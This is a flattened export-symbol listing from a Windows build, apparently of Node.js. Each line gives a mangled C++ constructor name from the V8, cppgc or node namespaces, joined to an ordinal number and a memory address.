                                                                                                                                                                                                        ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@AEBU0123@@Z6660x14047cdf0
                                                                                                                                                                                                        ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@XZ6670x14047ce80
                                                                                                                                                                                                        ??0InterpreterDispatchDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z6680x1404b9be0
                                                                                                                                                                                                        ??0InterpreterDispatchDescriptor@internal@v8@@QEAA@XZ6690x1404ba840
                                                                                                                                                                                                        ??0InterruptsScope@internal@v8@@QEAA@PEAVIsolate@12@_JW4Mode@012@@Z6700x140a1b250
                                                                                                                                                                                                        ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@$$QEAV012@@Z6710x14047c700
                                                                                                                                                                                                        ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@AEBV012@@Z6720x14047c790
                                                                                                                                                                                                        ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@PEAVMemoryChunk@12@PEAV?$set@VHeapObject@internal@v8@@UComparer@Object@23@V?$allocator@VHeapObject@internal@v8@@@std@@@std@@@Z6730x1409a5b20
                                                                                                                                                                                                        ??0InvalidatedSlotsFilter@internal@v8@@QEAA@$$QEAV012@@Z6740x14047c820
                                                                                                                                                                                                        ??0InvalidatedSlotsFilter@internal@v8@@QEAA@AEBV012@@Z6750x14047c8b0
                                                                                                                                                                                                        ??0InvalidatedSlotsFilter@internal@v8@@QEAA@PEAVMemoryChunk@12@PEAV?$set@VHeapObject@internal@v8@@UComparer@Object@23@V?$allocator@VHeapObject@internal@v8@@@std@@@std@@@Z6760x1409a5bc0
                                                                                                                                                                                                        ??0Isolate@internal@v8@@AEAA@V?$unique_ptr@VIsolateAllocator@internal@v8@@U?$default_delete@VIsolateAllocator@internal@v8@@@std@@@std@@_N@Z6770x140a09930
                                                                                                                                                                                                        ??0IsolateAllocator@internal@v8@@QEAA@XZ6780x140924c90
                                                                                                                                                                                                        ??0IsolatePlatformDelegate@node@@QEAA@$$QEAV01@@Z6790x14007a120
                                                                                                                                                                                                        ??0IsolatePlatformDelegate@node@@QEAA@AEBV01@@Z6800x14007a120
                                                                                                                                                                                                        ??0IsolatePlatformDelegate@node@@QEAA@XZ6810x14007a120
                                                                                                                                                                                                        ??0Iterator@Script@internal@v8@@QEAA@PEAVIsolate@23@@Z6820x1407edbe0
                                                                                                                                                                                                        ??0JSCallReducer@compiler@internal@v8@@QEAA@$$QEAV0123@@Z6830x140f09af0
                                                                                                                                                                                                        ??0JSCallReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z6840x140f09c60
                                                                                                                                                                                                        ??0JSCallReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@V?$Flags@W4Flag@JSCallReducer@compiler@internal@v8@@H@base@3@@Z6850x140f09e00
                                                                                                                                                                                                        ??0JSContextSpecialization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@V?$Maybe@UOuterContext@compiler@internal@v8@@@3@V?$MaybeHandle@VJSFunction@internal@v8@@@23@@Z6860x140f09e70
                                                                                                                                                                                                        ??0JSCreateLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z6870x140f09eb0
                                                                                                                                                                                                        ??0JSCreateLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVCompilationDependencies@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@@Z6880x140f09ef0
                                                                                                                                                                                                        ??0JSFunctionBuilder@Factory@internal@v8@@QEAA@PEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@@Z6890x1409ce120
                                                                                                                                                                                                        ??0JSFunctionRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z6900x1404ba850
                                                                                                                                                                                                        ??0JSGraph@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVJSOperatorBuilder@123@PEAVSimplifiedOperatorBuilder@123@PEAVMachineOperatorBuilder@123@@Z6910x140ed3170
                                                                                                                                                                                                        ??0JSGraphAssembler@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVZone@23@V?$Optional@V?$function@$$A6AXPEAVNode@compiler@internal@v8@@@Z@std@@@base@3@PEAVSchedule@123@_N@Z6920x140eeae10
                                                                                                                                                                                                        ??0JSHeapBroker@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@@Z6930x140e80a60
                                                                                                                                                                                                        ??0JSHeapBroker@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@_N2W4CodeKind@23@@Z6940x140f2d740
                                                                                                                                                                                                        ??0JSHeapCopyReducer@compiler@internal@v8@@QEAA@$$QEAV0123@@Z6950x140f09f20
                                                                                                                                                                                                        ??0JSHeapCopyReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z6960x140f09f20
                                                                                                                                                                                                        ??0JSHeapCopyReducer@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@@Z6970x141010950
                                                                                                                                                                                                        ??0JSIntrinsicLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z6980x140f0a0c0
                                                                                                                                                                                                        ??0JSIntrinsicLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z6990x141014bf0
                                                                                                                                                                                                        ??0JSNativeContextSpecialization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@V?$Flags@W4Flag@JSNativeContextSpecialization@compiler@internal@v8@@H@base@3@PEAVCompilationDependencies@123@PEAVZone@23@5@Z7000x141017580
                                                                                                                                                                                                        ??0JSOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z7010x140f38dd0
                                                                                                                                                                                                        ??0JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEBUWasmModule@123@_NAEBVWasmFeatures@123@W4AllowGeneric@0123@@Z7020x1405bf6b0
                                                                                                                                                                                                        ??0JSTypedLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z7030x140f0a0f0
                                                                                                                                                                                                        ??0JSTypedLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@@Z7040x141026020
                                                                                                                                                                                                        ??0JumpTableAssembler@wasm@internal@v8@@AEAA@_KH@Z7050x14052e680
                                                                                                                                                                                                        ??0JumpTableTargetOffsets@interpreter@internal@v8@@QEAA@PEBVBytecodeArrayIterator@123@HHH@Z7060x140913680
                                                                                                                                                                                                        ??0LargeObjectSpace@internal@v8@@IEAA@PEAVHeap@12@W4AllocationSpace@12@@Z7070x1409a4160
                                                                                                                                                                                                        ??0LargePage@internal@cppgc@@AEAA@AEAVHeapBase@12@AEAVBaseSpace@12@_K@Z7080x1404646a0
                                                                                                                                                                                                        ??0LargePageMemoryRegion@internal@cppgc@@QEAA@PEAVPageAllocator@v8@@_K@Z7090x140458120
                                                                                                                                                                                                        ??0LargePageSpace@internal@cppgc@@QEAA@PEAVRawHeap@12@_K@Z7100x1404644c0
                                                                                                                                                                                                        ??0LazilyGeneratedNames@wasm@internal@v8@@QEAA@XZ7110x14047c940
                                                                                                                                                                                                        ??0LazyCompileDispatcher@internal@v8@@QEAA@PEAVIsolate@12@PEAVPlatform@2@_K@Z7120x140a7b5f0
                                                                                                                                                                                                        ??0Linkage@compiler@internal@v8@@QEAA@PEAVCallDescriptor@123@@Z7130x140078b40
                                                                                                                                                                                                        ??0LiveRange@compiler@internal@v8@@AEAA@HW4MachineRepresentation@23@PEAVTopLevelLiveRange@123@@Z7140x140f7e410
                                                                                                                                                                                                        ??0LoadElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z7150x140f0a140
                                                                                                                                                                                                        ??0Local@MarkingWorklists@internal@v8@@QEAA@PEAV123@@Z7160x140975dc0
                                                                                                                                                                                                        ??0LocalAllocationBuffer@internal@v8@@AEAA@PEAVHeap@12@VLinearAllocationArea@12@@Z7170x140955ca0
                                                                                                                                                                                                        ??0LocalAllocationBuffer@internal@v8@@QEAA@$$QEAV012@@Z7180x140955cf0
                                                                                                                                                                                                        ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z7190x14053d6a0
                                                                                                                                                                                                        ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@AEBV0123@@Z7200x14053d6e0
                                                                                                                                                                                                        ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@PEAVZone@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@@Z7210x14053d7c0
                                                                                                                                                                                                        ??0LocalEmbedderHeapTracer@internal@v8@@QEAA@AEBV012@@Z7220x140952260
                                                                                                                                                                                                        ??0LocalEmbedderHeapTracer@internal@v8@@QEAA@PEAVIsolate@12@@Z7230x1409522c0
                                                                                                                                                                                                        ??0LocalFactory@internal@v8@@QEAA@PEAVIsolate@12@@Z7240x1409a4000
                                                                                                                                                                                                        ??0LocalHeap@internal@v8@@QEAA@PEAVHeap@12@W4ThreadKind@12@V?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@@Z7250x1409a3220
                                                                                                                                                                                                        ??0LocalIsolate@internal@v8@@QEAA@PEAVIsolate@12@W4ThreadKind@12@PEAVRuntimeCallStats@12@@Z7260x140a08420
                                                                                                                                                                                                        ??0Location@debug@v8@@QEAA@HH@Z7270x140a6d890
                                                                                                                                                                                                        ??0Location@debug@v8@@QEAA@XZ7280x140a6d8a0
                                                                                                                                                                                                        ??0Location@v8@@QEAA@HH@Z7290x140078af0
                                                                                                                                                                                                        ??0Locker@v8@@QEAA@PEAVIsolate@1@@Z7300x140078fb0
                                                                                                                                                                                                        ??0LookupIterator@internal@v8@@AEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@V?$Handle@VMap@internal@v8@@@12@VPropertyDetails@12@_N@Z7310x14081b980
                                                                                                                                                                                                        ??0LookupIterator@internal@v8@@AEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@_K1W4Configuration@012@@Z7320x14047c960
                                                                                                                                                                                                        ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@AEBVPropertyKey@12@1W4Configuration@012@@Z7330x14047cb10
                                                                                                                                                                                                        ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@AEBVPropertyKey@12@W4Configuration@012@@Z7340x14047cb50
                                                                                                                                                                                                        ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@1W4Configuration@012@@Z7350x14047cb80
                                                                                                                                                                                                        ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@W4Configuration@012@@Z7360x14047cbc0
                                                                                                                                                                                                        ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@_K1W4Configuration@012@@Z7370x14047cbf0
                                                                                                                                                                                                        ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@_KW4Configuration@012@@Z7380x14047cc30
                                                                                                                                                                                                        ??0LoopBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z7390x1408f29e0
                                                                                                                                                                                                        ??0LoopInfo@compiler@internal@v8@@QEAA@$$QEAU0123@@Z7400x140f919c0
                                                                                                                                                                                                        ??0LoopInfo@compiler@internal@v8@@QEAA@AEBU0123@@Z7410x140f91a10
                                                                                                                                                                                                        ??0LoopInfo@compiler@internal@v8@@QEAA@HHHPEAVZone@23@@Z7420x140f91b10
                                                                                                                                                                                                        ??0LoopPeeler@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVLoopTree@123@PEAVZone@23@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@@Z7430x140f0a170
                                                                                                                                                                                                        ??0MachineGraph@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@@Z7440x140ed32c0
                                                                                                                                                                                                        ??0MachineOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@W4MachineRepresentation@23@V?$Flags@W4Flag@MachineOperatorBuilder@compiler@internal@v8@@I@base@3@VAlignmentRequirements@0123@@Z7450x140eb9610
                                                                                                                                                                                                        ??0MachineOperatorReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z7460x140f0a1a0
                                                                                                                                                                                                        ??0MachineOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVMachineGraph@123@_N@Z7470x141044910
                                                                                                                                                                                                        ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@@Z7480x14049b090
                                                                                                                                                                                                        ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z7490x14049b0d0
                                                                                                                                                                                                        ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@@Z7500x14049b130
                                                                                                                                                                                                        ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z7510x14049b160
                                                                                                                                                                                                        ??0MapRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z7520x1404ba8b0
                                                                                                                                                                                                        ??0MapUpdater@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VMap@internal@v8@@@12@@Z7530x140815f50
                                                                                                                                                                                                        ??0Marker@internal@cppgc@@QEAA@VKey@MarkerBase@12@AEAVHeapBase@12@PEAVPlatform@2@UMarkingConfig@412@@Z7540x14045cb80
                                                                                                                                                                                                        ??0MarkerBase@internal@cppgc@@IEAA@VKey@012@AEAVHeapBase@12@PEAVPlatform@2@UMarkingConfig@012@@Z7550x14045cc80
                                                                                                                                                                                                        ??0MarkingVerifier@internal@cppgc@@QEAA@AEAVHeapBase@12@@Z7560x14045aca0
                                                                                                                                                                                                        ??0MarkingVerifierBase@internal@cppgc@@IEAA@AEAVHeapBase@12@AEAVVerificationState@12@V?$unique_ptr@VVisitor@cppgc@@U?$default_delete@VVisitor@cppgc@@@std@@@std@@@Z7570x14045ad20
                                                                                                                                                                                                        ??0MarkingVisitorBase@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVMarkingStateBase@12@@Z7580x14045a1b0
                                                                                                                                                                                                        ??0MarkingWorklists@internal@v8@@QEAA@XZ7590x14047cc60
                                                                                                                                                                                                        ??0MeasureMemoryDelegate@internal@v8@@QEAA@AEBV012@@Z7600x140970dc0
                                                                                                                                                                                                        ??0MeasureMemoryDelegate@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VNativeContext@internal@v8@@@12@V?$Handle@VJSPromise@internal@v8@@@12@W4MeasureMemoryMode@2@@Z7610x140970df0
                                                                                                                                                                                                        ??0MeasureMemoryDelegate@v8@@QEAA@AEBV01@@Z7620x140079b20
                                                                                                                                                                                                        ??0MeasureMemoryDelegate@v8@@QEAA@XZ7630x140079b20
                                                                                                                                                                                                        ??0MemoryAllocator@internal@v8@@QEAA@PEAVIsolate@12@PEAVPageAllocator@2@_K@Z7640x1409743f0
                                                                                                                                                                                                        ??0MemoryMappedFile@OS@base@v8@@QEAA@AEBV0123@@Z7650x140079b20
                                                                                                                                                                                                        ??0MemoryMappedFile@OS@base@v8@@QEAA@XZ7660x140079b20
                                                                                                                                                                                                        ??0MemoryReducer@internal@v8@@QEAA@PEAVHeap@12@@Z7670x140970540
                                                                                                                                                                                                        ??0MemoryRegion@internal@cppgc@@QEAA@PEAE_K@Z7680x140450cf0
                                                                                                                                                                                                        ??0MemoryRegion@internal@cppgc@@QEAA@XZ7690x140079750
                                                                                                                                                                                                        ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@HH@Z7700x140a03880
                                                                                                                                                                                                        ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@HHV?$Handle@VSharedFunctionInfo@internal@v8@@@12@@Z7710x140a038a0
                                                                                                                                                                                                        ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@H@Z7720x140a038c0
                                                                                                                                                                                                        ??0MessageLocation@internal@v8@@QEAA@XZ7730x140a038e0
                                                                                                                                                                                                        ??0MicrotaskQueue@internal@v8@@AEAA@XZ7740x140a02bb0
                                                                                                                                                                                                        ??0MicrotaskQueue@v8@@AEAA@XZ7750x1400798f0
                                                                                                                                                                                                        ??0MicrotasksScope@v8@@QEAA@PEAVIsolate@1@PEAVMicrotaskQueue@1@W4Type@01@@Z7760x140b068b0
                                                                                                                                                                                                        ??0MicrotasksScope@v8@@QEAA@PEAVIsolate@1@W4Type@01@@Z7770x140b068e0
                                                                                                                                                                                                        ??0ModuleWireBytes@wasm@internal@v8@@QEAA@PEBE0@Z7780x14047ccf0
                                                                                                                                                                                                        ??0ModuleWireBytes@wasm@internal@v8@@QEAA@V?$Vector@$$CBE@base@3@@Z7790x140079760
                                                                                                                                                                                                        ??0MoveOperands@compiler@internal@v8@@QEAA@AEBVInstructionOperand@123@0@Z7800x1404ba910
                                                                                                                                                                                                        ??0MoveOptimizer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVInstructionSequence@123@@Z7810x140f764c0
                                                                                                                                                                                                        ??0MultiIsolatePlatform@node@@QEAA@AEBV01@@Z7820x14007a130
                                                                                                                                                                                                        ??0MultiIsolatePlatform@node@@QEAA@XZ7830x14007a130
                                                                                                                                                                                                        ??0MutatorMarkingVisitor@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVMutatorMarkingState@12@@Z7840x14045a1d0
                                                                                                                                                                                                        ??0MutatorUnifiedHeapMarkingVisitor@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@AEAVMutatorMarkingState@14@AEAVUnifiedHeapMarkingState@12@@Z7850x1409e6670
                                                                                                                                                                                                        ??0MutatorUnifiedHeapMarkingVisitor@internal@v8@@QEAA@AEBV012@@Z7860x1409e6690
                                                                                                                                                                                                        ??0Mutex@base@v8@@QEAA@XZ7870x1400fba60
                                                                                                                                                                                                        ??0NameConverter@disasm@@QEAA@XZ7880x1404b0030
                                                                                                                                                                                                        ??0NameDictionary@internal@v8@@IEAA@_K@Z7890x140078b40
                                                                                                                                                                                                        ??0NameDictionary@internal@v8@@QEAA@XZ7900x1400fba60
                                                                                                                                                                                                        ??0NameProvider@cppgc@@QEAA@AEBV01@@Z7910x140079fd0
                                                                                                                                                                                                        ??0NameProvider@cppgc@@QEAA@XZ7920x140079fd0
                                                                                                                                                                                                        ??0NativeContextStats@internal@v8@@QEAA@$$QEAV012@@Z7930x14047cd10
                                                                                                                                                                                                        ??0NativeContextStats@internal@v8@@QEAA@AEBV012@@Z7940x14047cdf0
                                                                                                                                                                                                        ??0NativeContextStats@internal@v8@@QEAA@XZ7950x14047ce80
                                                                                                                                                                                                        ??0NativeModule@wasm@internal@v8@@AEAA@AEBVWasmFeatures@123@VVirtualMemory@23@V?$shared_ptr@$$CBUWasmModule@wasm@internal@v8@@@std@@V?$shared_ptr@VCounters@internal@v8@@@7@PEAV?$shared_ptr@VNativeModule@wasm@internal@v8@@@7@@Z7960x140565d10
                                                                                                                                                                                                        ??0NativeModuleDeserializer@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z7970x140527b60
                                                                                                                                                                                                        ??0NativeModuleSerializer@wasm@internal@v8@@QEAA@PEBVNativeModule@123@V?$Vector@QEAVWasmCode@wasm@internal@v8@@@base@3@@Z7980x140527b90
                                                                                                                                                                                                        ??0NewSpace@internal@v8@@QEAA@PEAVHeap@12@PEAVPageAllocator@2@_K2@Z7990x14096ea30
                                                                                                                                                                                                        ??0NexusConfig@internal@v8@@AEAA@PEAVIsolate@12@@Z8000x14047cef0
                                                                                                                                                                                                        ??0NexusConfig@internal@v8@@AEAA@PEAVIsolate@12@PEAVLocalHeap@12@@Z8010x140450cf0
                                                                                                                                                                                                        ??0NoDumpOnJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z8020x140a7d880
                                                                                                                                                                                                        ??0NoGarbageCollectionScope@subtle@cppgc@@QEAA@AEAVHeapHandle@2@@Z8030x140464fd0
                                                                                                                                                                                                        ??0NoThrowOnJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z8040x140a7d8a0
                                                                                                                                                                                                        ??0Node@compiler@internal@v8@@AEAA@IPEBVOperator@123@HH@Z8050x140ea2470
                                                                                                                                                                                                        ??0NodeOriginTable@compiler@internal@v8@@QEAA@PEAVGraph@123@@Z8060x140f6c660
                                                                                                                                                                                                        ??0NormalPage@internal@cppgc@@AEAA@AEAVHeapBase@12@AEAVBaseSpace@12@@Z8070x1404646c0
                                                                                                                                                                                                        ??0NormalPageMemoryPool@internal@cppgc@@QEAA@AEBV012@@Z8080x140450d00
                                                                                                                                                                                                        ??0NormalPageMemoryPool@internal@cppgc@@QEAA@XZ8090x1404581b0
                                                                                                                                                                                                        ??0NormalPageMemoryRegion@internal@cppgc@@QEAA@PEAVPageAllocator@v8@@@Z8100x1404582e0
                                                                                                                                                                                                        ??0NormalPageSpace@internal@cppgc@@QEAA@PEAVRawHeap@12@_K_N@Z8110x140464510
                                                                                                                                                                                                        ??0OFStream@internal@v8@@QEAA@PEAU_iobuf@@@Z8120x1406b3970
                                                                                                                                                                                                        ??0OFStreamBase@internal@v8@@QEAA@AEBV012@@Z8130x14047cf00
                                                                                                                                                                                                        ??0OFStreamBase@internal@v8@@QEAA@PEAU_iobuf@@@Z8140x1406b3aa0
                                                                                                                                                                                                        ??0OSROptimizedCodeCache@internal@v8@@IEAA@_K@Z8150x140078b40
                                                                                                                                                                                                        ??0OSROptimizedCodeCache@internal@v8@@QEAA@XZ8160x1400fba60
                                                                                                                                                                                                        ??0ObjectAllocator@internal@cppgc@@QEAA@PEAVRawHeap@12@PEAVPageBackend@12@PEAVStatsCollector@12@@Z8170x14044f620
                                                                                                                                                                                                        ??0ObjectHashSet@internal@v8@@IEAA@_K@Z8180x140078b40
                                                                                                                                                                                                        ??0ObjectHashSet@internal@v8@@QEAA@XZ8190x1400fba60
                                                                                                                                                                                                        ??0ObjectHashTable@internal@v8@@IEAA@_K@Z8200x140078b40
                                                                                                                                                                                                        ??0ObjectHashTable@internal@v8@@QEAA@XZ8210x1400fba60
                                                                                                                                                                                                        ??0ObjectIterator@internal@v8@@QEAA@AEBV012@@Z8220x14047cf40
                                                                                                                                                                                                        ??0ObjectIterator@internal@v8@@QEAA@XZ8230x14047cf40
                                                                                                                                                                                                        ??0ObjectRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z8240x1404ba930
                                                                                                                                                                                                        ??0ObjectStartBitmap@internal@cppgc@@QEAA@PEAE@Z8250x14044f5d0
                                                                                                                                                                                                        ??0Operand@internal@v8@@QEAA@PEAVLabel@12@H@Z8260x14049b1c0
                                                                                                                                                                                                        ??0Operand@internal@v8@@QEAA@V012@H@Z8270x14050c030
                                                                                                                                                                                                        ??0Operand@internal@v8@@QEAA@VRegister@12@0W4ScaleFactor@12@H@Z8280x14049b1e0
                                                                                                                                                                                                        ??0Operand@internal@v8@@QEAA@VRegister@12@H@Z8290x14049b270
                                                                                                                                                                                                        ??0Operand@internal@v8@@QEAA@VRegister@12@W4ScaleFactor@12@H@Z8300x14049b350
                                                                                                                                                                                                        ??0OperationTyper@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVZone@23@@Z8310x1410a0690
                                                                                                                                                                                                        ??0OperationsBarrier@internal@v8@@QEAA@XZ8320x14047cf50
                                                                                                                                                                                                        ??0Operator@compiler@internal@v8@@QEAA@GV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@3@PEBD_K22222@Z8330x140f383b0
                                                                                                                                                                                                        ??0OptimizedCompilationInfo@internal@v8@@QEAA@PEAVZone@12@PEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@V?$Handle@VJSFunction@internal@v8@@@12@W4CodeKind@12@@Z8340x1404e2fc0
                                                                                                                                                                                                        ??0OptimizedCompilationInfo@internal@v8@@QEAA@PEAVZone@12@PEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@V?$Handle@VJSFunction@internal@v8@@@12@W4CodeKind@12@VBytecodeOffset@12@PEAVJavaScriptFrame@12@@Z8350x140a82310
                                                                                                                                                                                                        ??0OptimizedCompilationInfo@internal@v8@@QEAA@V?$Vector@$$CBD@base@2@PEAVZone@12@W4CodeKind@12@@Z8360x140a82510
                                                                                                                                                                                                        ??0OptimizingCompileDispatcher@internal@v8@@QEAA@PEAVIsolate@12@@Z8370x1406e2460
                                                                                                                                                                                                        ??0OrderedHashMap@internal@v8@@IEAA@_K@Z8380x140078b40
                                                                                                                                                                                                        ??0OrderedHashMap@internal@v8@@QEAA@XZ8390x1400fba60
                                                                                                                                                                                                        ??0OrderedHashSet@internal@v8@@IEAA@_K@Z8400x140078b40
                                                                                                                                                                                                        ??0OrderedHashSet@internal@v8@@QEAA@XZ8410x1400fba60
                                                                                                                                                                                                        ??0OrderedNameDictionary@internal@v8@@IEAA@_K@Z8420x140078b40
                                                                                                                                                                                                        ??0OrderedNameDictionary@internal@v8@@QEAA@XZ8430x1400fba60
                                                                                                                                                                                                        ??0OutputStream@v8@@QEAA@AEBV01@@Z8440x14007a070
                                                                                                                                                                                                        ??0OutputStream@v8@@QEAA@XZ8450x14007a070
                                                                                                                                                                                                        ??0OverrideEmbedderStackStateScope@testing@cppgc@@QEAA@AEAVHeapHandle@2@W4EmbedderStackState@2@@Z8460x1404516b0
                                                                                                                                                                                                        ??0PageAllocator@base@v8@@QEAA@AEBV012@@Z8470x140e63590
                                                                                                                                                                                                        ??0PageAllocator@base@v8@@QEAA@XZ8480x140e635b0
                                                                                                                                                                                                        ??0PageBackend@internal@cppgc@@QEAA@PEAVPageAllocator@v8@@@Z8490x140458370
                                                                                                                                                                                                        ??0PageMemory@internal@cppgc@@QEAA@VMemoryRegion@12@0@Z8500x140450dc0
                                                                                                                                                                                                        ??0PageMemoryRegion@internal@cppgc@@IEAA@PEAVPageAllocator@v8@@VMemoryRegion@12@_N@Z8510x140458450
                                                                                                                                                                                                        ??0PageMemoryRegionTree@internal@cppgc@@QEAA@AEBV012@@Z8520x140450de0
                                                                                                                                                                                                        ??0PageMemoryRegionTree@internal@cppgc@@QEAA@XZ8530x140458470
                                                                                                                                                                                                        ??0PagedSpace@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@W4Executability@12@PEAVFreeList@12@W4CompactionSpaceKind@12@@Z8540x140964200
                                                                                                                                                                                                        ??0PagedSpaceIterator@internal@v8@@QEAA@PEAVHeap@12@@Z8550x14047cf80
                                                                                                                                                                                                        ??0PagedSpaceObjectIterator@internal@v8@@QEAA@$$QEAV012@@Z8560x14047cf90
                                                                                                                                                                                                        ??0PagedSpaceObjectIterator@internal@v8@@QEAA@AEBV012@@Z8570x14047cf90
                                                                                                                                                                                                        ??0PagedSpaceObjectIterator@internal@v8@@QEAA@PEAVHeap@12@PEAVPagedSpace@12@@Z8580x1409642f0
                                                                                                                                                                                                        ??0PagedSpaceObjectIterator@internal@v8@@QEAA@PEAVHeap@12@PEAVPagedSpace@12@PEAVPage@12@@Z8590x140964350
                                                                                                                                                                                                        ??0ParallelMove@compiler@internal@v8@@QEAA@PEAVZone@23@@Z8600x1404b9c40
                                                                                                                                                                                                        ??0ParseInfo@internal@v8@@AEAA@VUnoptimizedCompileFlags@12@PEAVUnoptimizedCompileState@12@@Z8610x1407b21a0
                                                                                                                                                                                                        ??0ParseInfo@internal@v8@@QEAA@PEAVIsolate@12@VUnoptimizedCompileFlags@12@PEAVUnoptimizedCompileState@12@@Z8620x1407b2270
                                                                                                                                                                                                        ??0Parser@internal@v8@@QEAA@PEAVParseInfo@12@@Z8630x1407a32f0
                                                                                                                                                                                                        ??0PauseAllocationObserversScope@internal@v8@@QEAA@PEAVHeap@12@@Z8640x1409f34e0
                                                                                                                                                                                                        ??0PersistentHandleVisitor@v8@@QEAA@AEBV01@@Z8650x140079aa0
                                                                                                                                                                                                        ??0PersistentHandleVisitor@v8@@QEAA@XZ8660x140079aa0
                                                                                                                                                                                                        ??0PersistentHandles@internal@v8@@QEAA@PEAVIsolate@12@@Z8670x1409f3bc0
                                                                                                                                                                                                        ??0PersistentHandlesScope@internal@v8@@QEAA@PEAVIsolate@12@@Z8680x1409f3c40
